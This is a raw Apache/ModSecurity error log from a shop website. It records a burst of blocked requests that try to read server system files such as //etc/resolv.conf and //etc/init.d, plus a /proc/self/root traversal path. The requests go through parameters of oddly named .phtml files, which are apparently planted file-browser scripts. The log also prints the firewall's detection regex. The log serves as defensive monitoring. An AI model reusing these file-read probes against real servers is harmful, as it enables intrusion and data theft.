[Thu Mar 19 13:23:51.720056 2026] [:error] [pid 14269:tid 140411599251200] [client 57.141.18.81:51422] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwjFwbLMZ6AikZjR9VwtwAAABE"]
[Thu Mar 19 13:23:55.964485 2026] [:error] [pid 31803:tid 140411557287680] [client 57.141.18.38:51496] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjG-yqAr6etmhZHNpzEwAAAFY"]
[Thu Mar 19 13:23:56.551076 2026] [:error] [pid 17653:tid 140411590858496] [client 57.141.18.53:51502] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjHMdf6f5d65gmYZSMdAAAAtI"]
[Thu Mar 19 13:23:58.019343 2026] [:error] [pid 27293:tid 140411674785536] [client 57.141.18.53:51440] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjHv-YZRR_7pZ7nDKe3gAAA8g"]
[Thu Mar 19 13:23:58.403604 2026] [:error] [pid 14269:tid 140411607643904] [client 57.141.18.53:51540] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjHgbLMZ6AikZjR9VwuQAAABA"]
[Thu Mar 19 13:23:58.693977 2026] [:error] [pid 27403:tid 140411607643904] [client 57.141.18.89:51546] [client 57.141.18.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjHhkFeYa1D6dYQnAEagAAAdA"]
[Thu Mar 19 13:24:03.688277 2026] [:error] [pid 15826:tid 140411624429312] [client 57.141.18.105:51670] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjI-oXxyEfFpUF8f8gJQAAAU4"]
[Thu Mar 19 13:24:05.067213 2026] [proxy_fcgi:error] [pid 14269:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:49368] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:24:09.631381 2026] [mime_magic:error] [pid 17887:tid 140411741927168] (70014)End of file found: [client 57.141.18.53:51818] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:24:11.651805 2026] [:error] [pid 27403:tid 140411574073088] [client 57.141.18.25:51820] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwjKhkFeYa1D6dYQnAEcQAAAdQ"]
[Thu Mar 19 13:24:11.652866 2026] [:error] [pid 30077:tid 140411674785536] [client 57.141.18.56:51846] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwjK_u8EFLIOrSqIpu7sAAAAkg"]
[Thu Mar 19 13:24:11.653124 2026] [:error] [pid 14269:tid 140411632822016] [client 57.141.18.56:51848] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dbus-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwjKwbLMZ6AikZjR9VwxAAAAA0"]
[Thu Mar 19 13:24:14.477572 2026] [:error] [pid 17653:tid 140411632822016] [client 57.141.18.29:51934] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjLsdf6f5d65gmYZSMewAAAs0"]
[Thu Mar 19 13:24:25.014066 2026] [:error] [pid 15826:tid 140411683178240] [client 57.141.18.68:52160] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjOeoXxyEfFpUF8f8gMgAAAUc"]
[Thu Mar 19 13:24:26.102932 2026] [proxy_fcgi:error] [pid 14269:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:49942] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:24:29.988110 2026] [:error] [pid 27403:tid 140411582465792] [client 57.141.18.6:52274] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwjPRkFeYa1D6dYQnAEegAAAdM"]
[Thu Mar 19 13:24:50.141898 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:50628] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:25:12.137840 2026] [proxy_fcgi:error] [pid 30077:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:51132] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:25:19.018125 2026] [:error] [pid 17653:tid 140411599251200] [client 57.141.18.118:52284] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjb8df6f5d65gmYZSMlAAAAtE"]
[Thu Mar 19 13:25:41.181802 2026] [proxy_fcgi:error] [pid 27293:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:51958] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:25:56.527704 2026] [mime_magic:error] [pid 17887:tid 140411565680384] (70014)End of file found: [client 57.141.18.53:54314] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:26:04.053813 2026] [proxy_fcgi:error] [pid 17653:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:52576] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:26:14.341348 2026] [:error] [pid 19093:tid 140411616036608] [client 57.141.18.55:54282] [client 57.141.18.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwjpl_V7PWP6ixUYl7QVgAAAo8"]
[Thu Mar 19 13:26:28.297862 2026] [:error] [pid 26799:tid 140411540502272] [client 57.141.18.3:55038] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwjtNa6ubjKNq_cu4ZqQQAAA1g"]
[Thu Mar 19 13:26:31.752352 2026] [:error] [pid 14269:tid 140411607643904] [client 57.141.18.117:54948] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwjtwbLMZ6AikZjR9VxCAAAABA"]
[Thu Mar 19 13:26:32.033799 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:53262] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:26:39.521427 2026] [:error] [pid 17887:tid 140411691570944] [client 57.141.18.18:54712] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjvwkwaGbbGflqUZDbkgAAAMY"]
[Thu Mar 19 13:26:48.498655 2026] [:error] [pid 27293:tid 140411666392832] [client 57.141.18.17:55520] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwjx_-YZRR_7pZ7nDKfKQAAA8k"]
[Thu Mar 19 13:26:48.503200 2026] [:error] [pid 17887:tid 140411691570944] [client 57.141.18.34:55300] [client 57.141.18.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwjyAkwaGbbGflqUZDbnAAAAMY"]
[Thu Mar 19 13:26:48.608682 2026] [:error] [pid 17887:tid 140411548894976] [client 57.141.18.72:55328] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwjyAkwaGbbGflqUZDbnQAAANc"]
[Thu Mar 19 13:26:53.034047 2026] [proxy_fcgi:error] [pid 27403:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:53790] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:26:57.280335 2026] [:error] [pid 30077:tid 140411616036608] [client 57.141.18.10:55712] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwj0fu8EFLIOrSqIpu8DwAAAk8"]
[Thu Mar 19 13:26:58.396088 2026] [:error] [pid 27403:tid 140411691570944] [client 57.141.18.34:55836] [client 57.141.18.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwj0hkFeYa1D6dYQnAEvQAAAcY"]
[Thu Mar 19 13:26:59.135906 2026] [:error] [pid 15826:tid 140411691570944] [client 57.141.18.51:55810] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwj0-oXxyEfFpUF8f8gagAAAUY"]
[Thu Mar 19 13:27:01.869033 2026] [core:alert] [pid 19093:tid 140411624429312] [client 74.7.243.128:45472] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/lib/firmware
[Thu Mar 19 13:27:03.124162 2026] [:error] [pid 14269:tid 140411599251200] [client 57.141.18.120:55964] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwj1wbLMZ6AikZjR9VxIQAAABE"]
[Thu Mar 19 13:27:03.447696 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.87:55928] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwj19a6ubjKNq_cu4ZqWQAAA0M"]
